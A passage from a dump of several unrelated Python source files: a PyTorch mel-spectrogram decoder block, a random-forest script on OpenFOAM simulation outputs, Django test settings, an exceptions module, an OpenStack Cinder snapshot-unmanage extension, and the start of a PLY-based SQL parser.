refs_features: Optional[Tensor] = None,
src_masks: Optional[Tensor] = None,
ref_masks: Optional[Tensor] = None,
) -> Tuple[Tensor, List[Optional[Tensor]]]:
"""Forward function.
Args:
srcs: (batch, src_len, 768)
src_masks: (batch, src_len)
refs: (batch, 80, ref_len)
refs_features: (batch, ref_len, 768)
ref_masks: (batch, ref_len)
"""
# out: (src_len, batch, d_model)
out, attns = self.unet(srcs, refs, refs_features=refs_features, src_masks=src_masks, ref_masks=ref_masks)
# out: (src_len, batch, d_model)
out = self.smoothers(out, src_key_padding_mask=src_masks)
# out: (src_len, batch, 80)
out = self.mel_linear(out)
# out: (batch, 80, src_len)
out = out.transpose(1, 0).transpose(2, 1)
refined = self.post_net(out)
out = out + refined
# out: (batch, 80, src_len)
return out, attns
class UnetBlock(nn.Module):
"""Hierarchically attend on references."""
def __init__(self, d_model: int):
super(UnetBlock, self).__init__()
self.conv1 = nn.Conv1d(80, d_model, 3, padding=1, padding_mode="replicate")
self.conv2 = nn.Conv1d(d_model, d_model, 3, padding=1, padding_mode="replicate")
self.conv3 = nn.Conv1d(d_model, d_model, 3, padding=1, padding_mode="replicate")
self.prenet = nn.Sequential(
nn.Linear(768, 768), nn.ReLU(), nn.Linear(768, d_model),
)
self.features_prenet = nn.Sequential(
nn.Linear(768, 768), nn.ReLU(), nn.Linear(768, d_model),
)
self.extractor1 = Extractor(d_model, 2, 1024, no_residual=True)
self.extractor2 = Extractor(d_model, 2, 1024)
self.extractor3 = Extractor(d_model, 2, 1024)
def forward(
self,
srcs: Tensor,
refs: Tensor,
refs_features: Optional[Tensor] = None,
src_masks: Optional[Tensor] = None,
ref_masks: Optional[Tensor] = None,
) -> Tuple[Tensor, List[Optional[Tensor]]]:
"""Forward function.
Args:
srcs: (batch, src_len, 768)
src_masks: (batch, src_len)
refs: (batch, 80, ref_len)
refs_features: (batch, ref_len, 768)
ref_masks: (batch, ref_len)
"""
# tgt: (batch, tgt_len, d_model)
tgt = self.prenet(srcs)
refs_features = None if refs_features is None else self.features_prenet(refs_features)
# tgt: (tgt_len, batch, d_model)
tgt = tgt.transpose(0, 1)
# ref*: (batch, d_model, mel_len)
ref1 = self.conv1(refs)
ref2 = self.conv2(F.relu(ref1))
ref3 = self.conv3(F.relu(ref2))
# out*: (tgt_len, batch, d_model)
out, attn1 = self.extractor1(
tgt,
ref3.transpose(1, 2).transpose(0, 1),
memory_features=refs_features.transpose(0, 1),
tgt_key_padding_mask=src_masks,
memory_key_padding_mask=ref_masks,
)
out, attn2 = self.extractor2(
out,
ref2.transpose(1, 2).transpose(0, 1),
tgt_key_padding_mask=src_masks,
memory_key_padding_mask=ref_masks,
)
out, attn3 = self.extractor3(
out,
ref1.transpose(1, 2).transpose(0, 1),
tgt_key_padding_mask=src_masks,
memory_key_padding_mask=ref_masks,
)
# out: (tgt_len, batch, d_model)
return out, [attn1, attn2, attn3]
|
py | 1a4ba7c00dee2acb3461f30e41d512d9b2a15012 | import argparse
import matplotlib.pyplot as plt
import numpy as np
from joblib import dump
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
descript = """Using parameters to edit OpenFOAM parameters"""
parser = argparse.ArgumentParser(description=descript)
parser.add_argument("-workspace", help="The DAG spec root")
args = parser.parse_args()
training_percent = 0.6
timestep = -1
fontsize = 20
WORKSPACE = args.workspace
inputs_dir = WORKSPACE + "/merlin_info"
outputs_dir = WORKSPACE + "/combine_outputs"
outputs = np.load(outputs_dir + "/data.npz")
U = outputs["arr_0"]
enstrophy = outputs["arr_1"]
energy_byhand = np.sum(np.sum(U ** 2, axis=3), axis=2) / U.shape[2] / 2
enstrophy_all = np.sum(enstrophy, axis=2)
X = np.load(inputs_dir + "/samples.npy")
y = np.concatenate(
(
enstrophy_all[:, timestep].reshape(-1, 1),
energy_byhand[:, timestep].reshape(-1, 1),
),
axis=1,
)
X[:, 1] = np.log10(X[:, 0] / X[:, 1]) # np.log10(X)
y = np.log10(y)
training_size = int(training_percent * len(X))
X_train = X[:training_size]
y_train = y[:training_size]
X_test = X[training_size:]
y_test = y[training_size:]
regr = RandomForestRegressor(max_depth=10, random_state=0, n_estimators=7)
regr.fit(X_train, y_train)
print("training score:", regr.score(X_train, y_train))
print("testing score: ", regr.score(X_test, y_test))
print(mean_squared_error(y_test, regr.predict(X_test)))
dump(regr, "trained_model.joblib")
fig, ax = plt.subplots(3, 2, figsize=(25, 25), constrained_layout=True)
plt.rcParams.update({"font.size": 25})
plt.rcParams["lines.linewidth"] = 5
x = np.linspace(-5, 8, 100)
y1 = 1 * x
ax[0][0].plot(x, y1, "-r", label="y=x", linewidth=1)
y_pred = regr.predict(X_train)
ax[0][0].scatter(y_train[:, 0], y_pred[:, 0], label="Log10 Enstrophy")
ax[0][0].scatter(y_train[:, 1], y_pred[:, 1], label="Log10 Energy")
ax[0][0].set_title("Velocity Magnitude %s" % timestep)
ax[0][0].set_xlabel("Actual", fontsize=fontsize)
ax[0][0].set_ylabel("Predicted", fontsize=fontsize)
ax[0][0].set_title("Training Data, # Points: %s" % len(y_pred))
ax[0][0].legend()
ax[0][0].grid()
x_min = np.min([np.min(y_train[:, 0]), np.min(y_train[:, 1])])
y_min = np.min([np.min(y_pred[:, 0]), np.min(y_pred[:, 1])])
x_max = np.max([np.max(y_train[:, 0]), np.max(y_train[:, 1])])
y_max = np.max([np.max(y_pred[:, 0]), np.max(y_pred[:, 1])])
y_pred = regr.predict(X_test)
ax[0][1].plot(x, y1, "-r", label="y=x", linewidth=1)
ax[0][1].scatter(y_test[:, 0], y_pred[:, 0], label="Log10 Enstrophy")
ax[0][1].scatter(y_test[:, 1], y_pred[:, 1], label="Log10 Energy")
ax[0][1].set_xlabel("Actual", fontsize=fontsize)
ax[0][1].set_ylabel("Predicted", fontsize=fontsize)
ax[0][1].set_title("Testing Data, # Points: %s" % len(y_pred))
ax[0][1].legend()
ax[0][1].grid()
x_min = np.min([np.min(y_test[:, 0]), np.min(y_test[:, 1]), x_min]) - 0.1
y_min = np.min([np.min(y_pred[:, 0]), np.min(y_pred[:, 1]), y_min]) - 0.1
x_max = np.max([np.max(y_test[:, 0]), np.max(y_test[:, 1]), x_max]) + 0.1
y_max = np.max([np.max(y_pred[:, 0]), np.max(y_pred[:, 1]), y_max]) + 0.1
ax[0][0].set_xlim([x_min, x_max])
ax[0][0].set_ylim([y_min, y_max])
ax[0][1].set_xlim([x_min, x_max])
ax[0][1].set_ylim([y_min, y_max])
y_pred_all = regr.predict(X)
input_enstrophy = ax[1][1].scatter(X[:, 0], 10 ** y[:, 1], s=100, edgecolors="black")
ax[1][1].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[1][1].set_ylabel(r"$Energy$", fontsize=fontsize)
ax[1][1].set_title("Average Energy Variation with Lidspeed")
ax[1][1].grid()
input_energy = ax[1][0].scatter(
X[:, 0],
X[:, 1],
s=100,
edgecolors="black",
c=10 ** y[:, 1],
cmap=plt.get_cmap("viridis"),
)
ax[1][0].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[1][0].set_ylabel(r"$Log_{10}$(Reynolds Number)", fontsize=fontsize)
ax[1][0].set_title("Inputs vs Average Energy")
ax[1][0].grid()
cbar = plt.colorbar(input_energy, ax=ax[1][0])
cbar.ax.set_ylabel(r"$Energy$", rotation=270, labelpad=30)
ax[1][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[1][1].tick_params(axis="both", which="major", labelsize=fontsize)
ax[1][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[1][1].tick_params(axis="both", which="major", labelsize=fontsize)
y_pred_all = regr.predict(X)
input_enstrophy = ax[2][0].scatter(
X[:, 0],
X[:, 1],
s=100,
edgecolors="black",
c=y[:, 0] - y_pred_all[:, 0],
cmap=plt.get_cmap("Spectral"),
)
ax[2][0].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[2][0].set_ylabel(r"$Log_{10}$(Reynolds Number)", fontsize=fontsize)
ax[2][0].set_title("Inputs vs Enstrophy error")
ax[2][0].grid()
cbar = plt.colorbar(input_enstrophy, ax=ax[2][0])
cbar.ax.set_ylabel(r"$y_{act} - y_{pred}$", rotation=270, labelpad=30)
input_energy = ax[2][1].scatter(
X[:, 0],
X[:, 1],
s=100,
edgecolors="black",
c=y[:, 1] - y_pred_all[:, 1],
cmap=plt.get_cmap("Spectral"),
)
ax[2][1].set_xlabel(r"Lidspeed ($\frac{m}{s}$)", fontsize=fontsize)
ax[2][1].set_ylabel(r"$Log_{10}$(Reynolds Number)", fontsize=fontsize)
ax[2][1].set_title("Inputs vs Energy error")
ax[2][1].grid()
cbar = plt.colorbar(input_energy, ax=ax[2][1])
cbar.ax.set_ylabel(r"$y_{act} - y_{pred}$", rotation=270, labelpad=30)
ax[0][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[0][1].tick_params(axis="both", which="major", labelsize=fontsize)
ax[2][0].tick_params(axis="both", which="major", labelsize=fontsize)
ax[2][1].tick_params(axis="both", which="major", labelsize=fontsize)
plt.savefig("prediction.png")
|
py | 1a4ba8e3e18d6223227d879810470798ea2cc72e | DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = (
'templated_email',
)
SECRET_KEY = "notimportant"
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
|
py | 1a4ba8f7a80692080391d684be13c46ee220afcf | """Defines a common set of exceptions which developers can raise and/or catch."""
class ConfigValidationError(Exception):
"""Raised when a user's config settings fail validation."""
class FatalAPIError(Exception):
"""Exception raised when a failed request should not be considered retriable."""
class InvalidStreamSortException(Exception):
"""Exception to raise if sorting errors are found while syncing the records."""
class MapExpressionError(Exception):
"""Failed map expression evaluation."""
class MaxRecordsLimitException(Exception):
"""Exception to raise if the maximum number of allowable records is exceeded."""
class RecordsWitoutSchemaException(Exception):
"""Raised if a target receives RECORD messages prior to a SCHEMA message."""
class RetriableAPIError(Exception):
"""Exception raised when a failed request can be safely retried."""
class StreamMapConfigError(Exception):
"""Raised when a stream map has an invalid configuration."""
class TapStreamConnectionFailure(Exception):
"""Exception to raise when stream connection fails or stream is disconnected."""
class TooManyRecordsException(Exception):
"""Exception to raise when query returns more records than max_records."""
|
py | 1a4ba93291fbcec21c7f125dbef56db757424aa9 | # Copyright 2015 Huawei Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from six.moves import http_client
import webob
from webob import exc
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder import exception
from cinder.policies import manageable_snapshots as policy
from cinder import volume
LOG = logging.getLogger(__name__)
class SnapshotUnmanageController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(SnapshotUnmanageController, self).__init__(*args, **kwargs)
self.volume_api = volume.API()
@wsgi.response(http_client.ACCEPTED)
@wsgi.action('os-unmanage')
def unmanage(self, req, id, body):
"""Stop managing a snapshot.
This action is very much like a delete, except that a different
method (unmanage) is called on the Cinder driver. This has the effect
of removing the snapshot from Cinder management without actually
removing the backend storage object associated with it.
There are no required parameters.
A Not Found error is returned if the specified snapshot does not exist.
"""
context = req.environ['cinder.context']
LOG.info("Unmanage snapshot with id: %s", id)
try:
snapshot = self.volume_api.get_snapshot(context, id)
context.authorize(policy.UNMANAGE_POLICY, target_obj=snapshot)
self.volume_api.delete_snapshot(context, snapshot,
unmanage_only=True)
# Not found exception will be handled at the wsgi level
except exception.InvalidSnapshot as ex:
raise exc.HTTPBadRequest(explanation=ex.msg)
return webob.Response(status_int=http_client.ACCEPTED)
class Snapshot_unmanage(extensions.ExtensionDescriptor):
"""Enable volume unmanage operation."""
name = "SnapshotUnmanage"
alias = "os-snapshot-unmanage"
updated = "2014-12-31T00:00:00+00:00"
def get_controller_extensions(self):
controller = SnapshotUnmanageController()
extension = extensions.ControllerExtension(self, 'snapshots',
controller)
return [extension]
|
py | 1a4ba9fec94ee20e8bec8f9ebc8c84b515a18d63 | # GRUPO 5
# 201213062 - Mónica Raquel Calderon Muñoz
# 201213223 - Astrid Edith Hernandez Gonzalez
# 201213255 - Leonel Eduardo Avila Calvillo
# 201220159 - Diego Ahtohil Noj Armira
# 201220165 - Oscar Rolando Bernard Peralta
# IMPORT SECTION
import ply.lex as lex
import ply.yacc as yacc
from Expresiones import *
from Instrucciones import *
from Retorno import Retorno
from NodoAST import NodoAST
import re
# VARIABLES GLOBALES
counter_lexical_error = 1
counter_syntactic_error = 1
reporte_gramatical = []
# LISTADO DE PALABRAS RESERVADAS
palabras_reservadas = {
'select' : 'SELECT',
'where' : 'WHERE',
'limit' : 'LIMIT',
'group' : 'GROUP',
'by' : 'BY',
'having' : 'HAVING',
'order' : 'ORDER',
'asc' : 'ASC',
'desc' : 'DESC',
'offset' : 'OFFSET',
'nulls' : 'NULLS',
'last' : 'LAST',
'first' : 'FIRST',
'as' : 'AS',
'is' : 'IS',
'and' : 'AND',
'or' : 'OR',
'true' : 'TRUE',
'false' : 'FALSE',
'not' : 'NOT',
'distinct' : 'DISTINCT',
'count' : 'COUNT',
'avg' : 'AVG',
'sum' : 'SUM',
'max' : 'MAX',
'min' : 'MIN',
'greatest' : 'GREATEST',
'least' : 'LEAST',
'unknown' : 'UNKNOWN',
'between' : 'BETWEEN',
'simmetric' : 'SIMMETRIC',
'null' : 'NULL',
'union' : 'UNION',
'all' : 'ALL',
'intersect' : 'INTERSECT',
'except' : 'EXCEPT',
'case' : 'CASE',
'when' : 'WHEN',
'end' : 'END',
'then' : 'THEN',
'else' : 'ELSE',
'pi' : 'PI',
'in' : 'IN',
'any' : 'ANY',
'some' : 'SOME',
'like' : 'LIKE',
'substring' : 'SUBSTRING',
'substr' : 'SUBSTR',
'trim' : 'TRIM',
'leading' : 'LEADING',
'trailing' : 'TRAILING',
'both' : 'BOTH',
'encode' : 'ENCODE',
'decode' : 'DECODE',
'abs' : 'ABS',
'cbrt' : 'CBRT',
'ceil' : 'CEIL',
'ceiling' : 'CEILING',
'degrees' : 'DEGREES',
'div' : 'DIV',
'factorial' : 'FACTORIAL',
'floor' : 'FLOOR',
'gcd' : 'GCD',
'ln' : 'LN',
'log' : 'LOG',
'mod' : 'MOD',
'power' : 'POWER',
'radians' : 'RADIANS',
'round' : 'ROUND',
'sign' : 'SIGN',
'sqrt' : 'SQRT',
'width_bucket' : 'WIDTH_BUCKET',
'trunc' : 'TRUNC',
'random' : 'RANDOM',
'exp' : 'FEXP',
'extract' : 'EXTRACT',
'now' : 'NOW',
'hour' : 'HOUR',
'minute' : 'MINUTE',
'second' : 'SECOND',
'year' : 'YEAR',
'month' : 'MONTH',
'day' : 'DAY',
'timestamp' : 'TIMESTAMP',
'interval' : 'INTERVAL',
'date_part' : 'DATE_PART',
'current_date' : 'CURRENT_DATE',
'current_time' : 'CURRENT_TIME',
'length' : 'LENGTH',
'sha256' : 'SHA256',
'date' : 'DATE',
'integer' : 'INTEGER',
'convert' : 'CONVERT',
'create' : 'CREATE',
'replace' : 'REPLACE',
'database' : 'DATABASE',
'databases' : 'DATABASES',
'if' : 'IF',
'exists' : 'EXISTS',
'owner' : 'OWNER',
'mode' : 'MODE',
'alter' : 'ALTER',
'drop' : 'DROP',
'show' : 'SHOW',
'rename' : 'RENAME',
'to' : 'TO',
'insert' : 'INSERT',
'update' : 'UPDATE',
'set' : 'SET',
'into' : 'INTO',
'values' : 'VALUES',
'table' : 'TABLE',
'from' : 'FROM',
'delete' : 'DELETE',
'acos' : 'ACOS',
'acosd' : 'ACOSD',
'asin' : 'ASIN',
'asind' : 'ASIND',
'atan' : 'ATAN',
'atand' : 'ATAND',
'atan2' : 'ATAN2',
'atan2d' : 'ATAN2D',
'cos' : 'COS',
'cosd' : 'COSD',
'cot' : 'COT',
'cotd' : 'COTD',
'sin' : 'SIN',
'sind' : 'SIND',
'tan' : 'TAN',
'tand' : 'TAND',
'sinh' : 'SINH',
'cosh' : 'COSH',
'tanh' : 'TANH',
'asinh' : 'ASINH',
'acosh' : 'ACOSH',
'atanh' : 'ATANH',
'get_byte' : 'GETBYTE',
'set_byte' : 'SETBYTE',
'inherits' : 'INHERITS',
'primary' : 'PRIMARY',
'key' : 'KEY',
'foreign' : 'FOREIGN',
'references' : 'REFERENCES',
'constraint' : 'CONSTRAINT',
'check' : 'CHECK',
'unique' : 'UNIQUE',
'default' : 'DEFAULT',
'smallint' : 'SMALLINT',
'bigint' : 'BIGINT',
'numeric' : 'NUMERIC',
'real' : 'REAL',
'double' : 'DOUBLE',
'money' : 'MONEY',
'character' : 'CHARACTER',
'varchar' : 'VARCHAR',
'char' : 'CHAR',
'text' : 'TEXT',
'time' : 'TIME',
'boolean' : 'BOOLEAN',
'varying' : 'VARYING',
'type' : 'TYPE',
'enum' : 'ENUM',
'add' : 'ADD',
'column' : 'COLUMN',
'use' : 'USE',
'md5' : 'MD5',
'decimal' : 'DECIMAL',
'current_user' : 'CURRENT_USER',
'session_user' : 'SESSION_USER'
}
# LISTADO DE SIMBOLOS Y TOKENS
tokens = [
'COMA',
'ID',
'PABRE',
'PCIERRA',
'MAS',
'MENOS',
'POR',
'DIVIDIDO',
'MODULO',
'EXP',
'PUNTO',
'IGUAL',
'DIF',
'DIF1',
'MENOR',
'MENORIGUAL',
'MAYOR',
'MAYORIGUAL',
'NUMERO',
'DECIMALN',
'CADENA',
'PCOMA',
'IDALIAS',
'raizCuadrada',
'raizCubica',
'BAnd',
'BOr',
'BXor',
'BNot',
'DesplazaI',
'DesplazaD'
] + list(palabras_reservadas.values())
# EXPRESIONES REGULARES PARA TOKENS
t_COMA = r','
t_PABRE = r'\('
t_PCIERRA = r'\)'
t_MAS = r'\+'
t_MENOS = r'-'
t_POR = r'\*'
t_DIVIDIDO = r'/'
t_MODULO = r'\%'
t_EXP = r'\^'
t_PUNTO = r'\.'
t_IGUAL = r'\='
t_DIF = r'<>'
t_DIF1 = r'!='
t_MENOR = r'<'
t_MENORIGUAL = r'<='
t_MAYOR = r'>'
t_MAYORIGUAL = r'>='
t_PCOMA = r';'
t_raizCuadrada = r'\|\/'
t_raizCubica = r'\|\|\/'
t_BAnd = r'&'
t_BOr = r'\|'
t_BXor = r'#'
t_BNot = r'~'
t_DesplazaI = r'<<'
t_DesplazaD = r'>>'
# TOKENS IGNORADOS
t_ignore = " \t"
def t_DECIMALN(t):
r'\d+\.\d+'
try:
t.value = float(t.value)
except ValueError:
print("Float value too large %d", t.value)
t.value = 0
return t
def t_NUMERO(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_ID(t):
r'[a-zA-Z_][a-zA-Z_0-9]*'
t.type = palabras_reservadas.get(t.value.lower(),'ID')
return t
def t_IDALIAS(t):
r'\".*?\"'
t.value = t.value[1:-1]
return t
def t_CADENA(t):
r'\'.*?\''
t.value = t.value[1:-1]
return t
def t_COMENTARIO_MULTILINEA(t):
r'/\*(.|\n)*?\*/'
t.lexer.lineno += t.value.count('\n')
def t_COMENTARIO_SIMPLE(t):
r'--.*\n'
t.lexer.lineno += 1
# Function to count lines in input
def t_newline(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
# Function to get column of a token
def get_column(p_input, p_token):
line = p_input.rfind('\n', 0, p_token.lexpos) + 1
column = (p_token.lexpos - line) + 1
return column
# Function to print LEXICAL ERRORS
def t_error(t):
global counter_lexical_error
print("CARACTER ILEGAL '%s'" % t.value[0])
err = open("reports/error_lexical.txt", "a+")
txt = '<tr><td>' + str(counter_lexical_error) + '</td>'
txt += '<td>' + str(t.value[0]) + '</td>'
txt += '<td>' + 'Caracter ingresado no admitido.' + '</td>'
txt += '<td>' + str(t.lexer.lineno) + '</td>'
txt += '<td>' + str(get_column(t.lexer.lexdata, t)) + '</td><tr>\n'
err.write(txt)
err.close()
counter_lexical_error += 1
t.lexer.skip(1)
# BUILDING LEXICAL FILES
lexer = lex.lex(reflags=re.IGNORECASE)
# OPERATORS PRECEDENCE
precedence = (
('left', 'OR'),
('left', 'AND'),
('right', 'NOT'),
('nonassoc', 'IS', 'NULL'),
('left', 'MENORIGUAL', 'MAYORIGUAL', 'IGUAL', 'DIF', 'DIF1', 'MENOR', 'MAYOR'),
('nonassoc', 'BETWEEN', 'NOTB'),
('left', 'MAS', 'MENOS'),
('left', 'POR', 'DIVIDIDO', 'MODULO'),
('left', 'EXP'),
('right', 'UMENOS', 'UMAS')
)
# GRAMMAR DEFINITION
def p_init(t):
"""
init : INSTRUCCIONES
"""
t[0] = t[1]
def p_instrucciones1(t):
"""
INSTRUCCIONES : INSTRUCCIONES INSTRUCCION
"""
global reporte_gramatical
reporte_gramatical.append("<INSTRUCCIONES> ::= <INSTRUCCIONES> <INSTRUCCION>")
val = t[1].getInstruccion()
val.append(t[2].getInstruccion())
ret = Retorno(val, NodoAST("INST"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_instrucciones2(t):
"""
INSTRUCCIONES : INSTRUCCION
"""
global reporte_gramatical
reporte_gramatical.append("<INSTRUCCIONES> ::= <INSTRUCCION>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST("INST"))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_instruccion1(t):
"""
INSTRUCCION : I_SELECT COMPLEMENTOSELECT
"""
global reporte_gramatical
reporte_gramatical.append("<INSTRUCCION> ::= <I_SELECT> <COMPLEMENTOSELECT>")
if t[2] is None:
t[0] = t[1]
else:
if isinstance(t[2].getInstruccion(), ComplementoSelectUnion):
ret = Retorno(Union(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("UNION"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectUnionAll):
ret = Retorno(UnionAll(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("UNION ALL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectIntersect):
ret = Retorno(Intersect(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("INTERSECT"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectIntersectALL):
ret = Retorno(IntersectAll(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("INTERSECT ALL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectExcept):
ret = Retorno(Except(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("EXCEPT"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectExceptAll):
ret = Retorno(ExceptAll(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("EXCEPT ALL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_instruccion2(t):
"""
INSTRUCCION : I_REPLACE
| I_CTABLE
| I_CTYPE
| I_DROP
| I_INSERT
| I_ALTERDB
| I_UPDATE
| I_SHOW
| I_DELETE
| I_USE
| I_ALTERTB
"""
t[0] = t[1]
def p_use(t):
'I_USE : USE ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_USE> ::= "USE" "ID" ";"')
ret = Retorno(UseDatabase(t[2]),NodoAST("USE"))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
# CREATE TYPE
def p_ctype(t):
'I_CTYPE : CREATE TYPE ID AS ENUM PABRE I_LVALUES PCIERRA PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_CTYPE> ::= "CREATE" "TYPE" "ID" "AS" "ENUM" "(" <I_LVALUES> ")" ";"')
ret = Retorno(CreateType(t[3],t[7].getInstruccion()),NodoAST("CREATE TYPE"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_lcad1(t):
'I_LVALUES : I_LVALUES COMA CONDI'
global reporte_gramatical
reporte_gramatical.append('<I_LVALUES> ::= <I_LVALUES> "," <CONDI>')
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_lcad2(t):
'I_LVALUES : CONDI'
global reporte_gramatical
reporte_gramatical.append('<I_LVALUES> ::= <CONDI>')
val = [t[1].getInstruccion()]
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_Ilcad2(t):
'CONDI : CONDICION'
global reporte_gramatical
reporte_gramatical.append('<CONDI> ::= <CONDICION>')
t[0] = t[1]
# TERMINO CREATE TYPE
def p_ctable(t):
"""
I_CTABLE : TABLE ID PABRE I_LTATRIBUTOS PCIERRA I_INHERITS
"""
#INSTRUCCION CTABLE
def p_inherits(t):
'I_INHERITS : INHERITS PABRE ID PCIERRA PCOMA'
def p_inherits1(t):
'I_INHERITS : PCOMA'
def p_tAtributos(t):
'I_LTATRIBUTOS : I_LTATRIBUTOS COMA I_TATRIBUTOS'
def p_tAtributos1(t):
'I_LTATRIBUTOS : I_TATRIBUTOS'
def p_atributosT(t):
'I_TATRIBUTOS : ID I_TIPO LI_LLAVES'
def p_atributosTipo(t):
'I_TATRIBUTOS : ID I_TIPO'
def p_atributosT1(t):
'I_TATRIBUTOS : PCONSTRAINT'
def p_PConstraint(t):
'PCONSTRAINT : CONSTRAINT ID TIPO_CONSTRAINT'
def p_PConstrainTipo(t):
'PCONSTRAINT : TIPO_CONSTRAINT'
def p_TipoConstraintUnique(t):
'TIPO_CONSTRAINT : UNIQUE PABRE I_LIDS PCIERRA'
def p_TipoConstraintPrimaryKey(t):
'TIPO_CONSTRAINT : PRIMARY KEY PABRE I_LIDS PCIERRA'
def p_ipoConstraintCheck(t):
'TIPO_CONSTRAINT : CHECK CONDICION'
def p_ipoConstraintForeignKey(t):
'TIPO_CONSTRAINT : FOREIGN KEY PABRE I_LIDS PCIERRA REFERENCES ID PABRE I_LIDS PCIERRA'
def p_Lllave(t):
'LI_LLAVES : LI_LLAVES I_LLAVES'
def p_Lllave1(t):
'LI_LLAVES : I_LLAVES'
def p_cRef(t):
'I_CREFERENCE : I_CREFERENCE COMA ID'
def p_cRef2(t):
'I_CREFERENCE : ID'
def p_llave(t):
'I_LLAVES : PRIMARY KEY'
def p_llave2(t):
'I_LLAVES : REFERENCES ID PABRE I_CREFERENCE PCIERRA'
def p_llave3(t):
'I_LLAVES : DEFAULT ID'
def p_llave4(t):
'I_LLAVES : NULL'
def p_llave5(t):
'I_LLAVES : NOT NULL'
def p_llave6(t):
'I_LLAVES : CONSTRAINT ID'
def p_llave7(t):
'I_LLAVES : UNIQUE PABRE I_LIDS PCIERRA'
def p_llave9(t):
'I_LLAVES : UNIQUE'
def p_llave10(t):
'I_LLAVES : CHECK PABRE I_LIDS PCIERRA'
def p_llave11(t):
'I_LLAVES : FOREIGN KEY PABRE I_LIDS PCIERRA REFERENCES ID PABRE I_LIDS PCIERRA '
def p_lIds(t):
'I_LIDS : I_LIDS COMA CONDICION'
def p_lIds1(t):
'I_LIDS : CONDICION'
# TIPOS DE DATOS
def p_tipo(t):
'I_TIPO : SMALLINT'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "SMALLINT" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo2(t):
'I_TIPO : INTEGER'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "INTEGER" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo3(t):
'I_TIPO : BIGINT'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "BIGINT" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo4(t):
'I_TIPO : DECIMAL PABRE NUMERO COMA NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DECIMAL" "(" "NUMERO" "," "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],t[5],t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(str(t[1])))
t[0] = ret
def p_tipo4_1(t):
'I_TIPO : DECIMAL'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DECIMAL" ')
